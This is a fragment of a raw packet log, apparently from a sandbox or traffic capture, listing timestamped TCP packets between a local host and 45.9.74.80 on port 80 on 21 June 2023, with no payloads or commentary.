Jun 21, 2023 04:27:58.235606909 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.235639095 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.235686064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.235701084 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.235730886 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.235776901 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.235785961 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.235822916 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.235842943 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.235867023 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.235913038 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.235923052 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.235959053 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.236004114 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.236017942 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.236049891 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.236093998 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.236138105 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.236149073 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.236182928 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.236227989 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.236243963 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.236285925 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.236296892 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.236346960 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.236391068 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.236423016 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.236438990 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.236485004 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.236500978 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.236532927 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.236591101 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.239774942 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.261843920 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.261933088 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.261980057 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.262023926 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.262044907 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.262068987 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.262099028 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.262114048 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.262160063 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.262202978 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.262212038 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.262248039 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.262259960 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.262295008 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.262340069 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.262357950 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.262412071 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.262459993 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.262463093 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.262506008 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.262553930 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.262599945 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.262600899 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.262645960 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.262650967 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.262693882 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.262737989 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.262772083 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.262785912 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.262831926 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.262875080 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.262876034 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.262922049 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.262931108 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.262984037 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.263026953 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.263029099 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.263072014 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.263118982 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.263128042 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.263164043 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.263209105 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.263210058 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.263254881 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.263298988 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.263334036 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.263344049 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.263390064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.263397932 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.263437033 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.263484001 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.263494968 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.263531923 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.263578892 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.263591051 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.263624907 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.263669968 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.263675928 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.263715029 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.263760090 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.263788939 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.263804913 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.263848066 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.263851881 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.263895988 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.263941050 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.263946056 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.263991117 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.264035940 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.264053106 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.264081001 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.264126062 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.264170885 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.264175892 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.264219046 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.264247894 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.264282942 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.264334917 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.264339924 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.264379978 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.264425039 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.264426947 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.264471054 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.264513969 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.264518976 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.264561892 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.264606953 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.264610052 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.264652967 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.264698029 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.264700890 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.264744043 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.264789104 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.264834881 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.264838934 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.264880896 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.264925003 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.264934063 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.264971972 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.264971972 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.265017986 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.265063047 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.265064001 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.265110016 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.265157938 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.265167952 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.265203953 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.265245914 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.265250921 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.265295982 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.265341997 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.265392065 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.265456915 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.265502930 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.265549898 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.265595913 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.265619040 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.265641928 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.265688896 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.265726089 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.265734911 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.265750885 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.265782118 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.265826941 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.265872002 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.265882969 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.265917063 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.265928030 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.265964031 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.266011000 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.266016006 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.266055107 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.266099930 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.266100883 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.266148090 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.266191959 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.266196966 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.266237974 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.266283989 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.266284943 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.293061972 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.293144941 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.293209076 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.293215036 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.293258905 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.293306112 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.293313980 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.293354034 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.293359041 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.293401003 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.293447018 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.293457031 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.293493032 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.293543100 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.293565989 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.293590069 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.293637037 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.293680906 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.293689013 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.293730974 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.293776035 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.293783903 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.293822050 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.293837070 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.293869019 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.293915033 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.293961048 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.294006109 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.294051886 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.294069052 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.294097900 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.294142962 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.294183969 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.294188023 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.294204950 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.294234991 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.294281960 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.294289112 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.294329882 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.294374943 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.294379950 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.294420958 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.294466019 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.294481039 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.294512033 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.294560909 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.294606924 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.294624090 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.294653893 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.294699907 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.294714928 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.294745922 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.294747114 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.294791937 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.294837952 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.294847965 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.294883966 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.294930935 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.294935942 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.294977903 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.295023918 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.295068979 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.295070887 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.295114040 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.295159101 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.295170069 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.295205116 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.295207977 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.295248985 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.295295000 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.295300961 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.295341015 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.295387030 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.295392036 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.295433998 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.295478106 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.295486927 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.295527935 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.295573950 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.295588017 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.295619965 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.295665026 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.295684099 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.295710087 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.295754910 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.295800924 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.295809031 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.295845985 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.295892000 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.295905113 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.295938015 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.295945883 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.295984030 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.296030045 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.296036005 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.296076059 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.296120882 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.296127081 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.296166897 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.296221972 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.296231031 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.296345949 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.296394110 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.296406984 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.296441078 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.296494007 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.296541929 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.296544075 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.296591043 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.296634912 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.296644926 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.296683073 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.296693087 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.296727896 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.296772957 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.296776056 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.296817064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.296860933 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.296874046 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.296906948 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.296952009 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.296996117 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.297005892 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.297043085 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.297087908 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.297092915 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.297132969 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.297132969 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.297178984 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.297224045 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.297226906 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.297269106 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.297314882 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.297316074 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.297359943 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.297405005 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.297450066 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.297461987 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.297502041 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.308805943 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.313168049 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.326049089 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.326121092 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.326169014 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.326196909 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.326217890 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.326265097 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.326266050 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.326313972 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.326355934 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.326360941 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.326409101 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.326455116 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.326459885 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.326499939 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.326550007 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.326597929 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.326606035 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.326646090 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.326693058 CEST	80	49719	45.9.74.80	192.168.2.3
